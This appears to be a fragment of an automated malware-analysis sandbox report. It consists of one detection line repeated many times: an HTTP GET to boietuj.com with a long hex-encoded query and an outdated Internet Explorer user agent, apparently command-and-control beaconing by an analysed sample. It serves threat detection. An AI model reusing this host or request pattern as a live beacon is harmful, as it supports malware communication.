            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
            Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ec958f4f805a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b413e96cc92be20ea478cc51bbe358b90d3b4eed3233d1626a8ff812c2ef929f3fcd6a HTTP/1.1Host: boietuj.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
